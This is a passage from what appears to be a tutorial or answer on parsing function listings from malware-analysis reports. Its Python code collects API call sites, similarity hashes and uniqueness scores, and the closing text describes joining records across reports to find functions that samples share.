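                current.apis.append(ApiCall(am.group(1), am.group(2), am.group(3), int(am.group(4), 16)))
        elif section == "Similarity":
            km = KV_RE.match(raw)
            if km:
                current.similarity[km.group(1)] = km.group(2)
        elif section == "Uniqueness":
            um = UNIQ_RE.match(line)
            if um:
                current.uniqueness = float(um.group(1))
    return records


def api_call_counts(rec: FunctionRecord) -> Dict[str, int]:
    """How many call sites each imported API has inside the function."""
    return dict(Counter(call.name for call in rec.apis))


def functions_calling(records: List[FunctionRecord], api_name: str) -> List[str]:
    """Names of all functions with at least one call site for api_name."""
    return [r.name for r in records if any(c.name == api_name for c in r.apis)]


def api_string_id_parts(rec: FunctionRecord):
    """Split 'API String ID: A-B' into its two numeric components."""
    a, _, b = rec.similarity.get("API String ID", "").partition("-")
    return int(a), int(b)


if __name__ == "__main__":
    for rec in parse_listing(SAMPLE):
        print(rec.name, rec.quality, api_call_counts(rec), rec.similarity.get("Instruction Fuzzy Hash"))
```

The section titles are matched as whole lines, so a code line that merely contains the word "Strings" does not switch state; the function name is taken from the first line of the body because it is the only place the listing prints it. Records can then be joined across reports on the Opcode ID or Instruction Fuzzy Hash fields to find functions shared between samples.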